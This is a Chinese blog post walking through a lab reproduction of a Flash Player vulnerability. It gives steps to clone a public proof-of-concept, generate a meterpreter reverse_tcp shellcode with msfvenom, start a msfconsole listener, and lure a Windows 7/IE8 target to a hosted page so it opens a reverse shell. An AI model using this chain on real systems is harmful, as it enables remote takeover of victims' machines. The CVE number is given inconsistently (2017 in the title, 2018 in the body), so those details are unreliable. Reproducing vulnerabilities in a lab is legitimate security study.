CVE-2017-4878 漏洞复现(Flash Player当前最新版本28.0.0.137以及之前的所有版本)

编程入门 行业动态 更新时间:2024-10-25 12:22:54

CVE-2017-4878 漏洞复现
**

漏洞介绍

**

1、漏洞概述
Flash Player当前最新版本28.0.0.137以及之前的所有版本
2 漏洞复现环境:
渗透机:Kali Linux + POC代码
靶机:win7+IE8.0+FLASH player
为了节省时间直接在 GitHub上下载poc 代码

3 漏洞复现实验过程:
复制下载链接:

git clone https://github/anbai-inc/CVE-2018-4878.git

使用git clone 命令 + 下载链接的方式 将POC 代码复制到本地 home目录下
或者直接在本机上下载然后复制到kali 中也是一样的效果

打开文件

我们需要对cve-2018-48778.py进行修改

将True 修改为False

还需要替换掉代码中原有的shellcode

使用命令
Msfvenom -p windows/meterpreter/reverse_tcp lhost = ip lport = port –f python > filename.txt

Cat shellcode.txt

将生成的shellcode.txt 内容替换原来 cve-2018-4878.py 中的shellcode

运行python 程序

运行出错了
貌似是程序中路径的问题
将路径修改成当前文件的路径

运行成功

查看文件

进入msfconsole 设置载荷

设置lhost 和lport

打开IE 访问http://192.168.88.107/test.html

但是由于电脑 falsh 插件的更新 和补丁的修复
没有向kali 反弹shell 如果换为28.0.0.137以及之前的所有版本都会建立反弹shell

更多推荐

CVE-2017-4878 漏洞复现(Flash Player当前最新版本28.0.0.137以及之前的所有版本)

本文发布于:2023-06-14 08:14:00,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1455011.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:最新版本   漏洞   版本   CVE   Flash

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!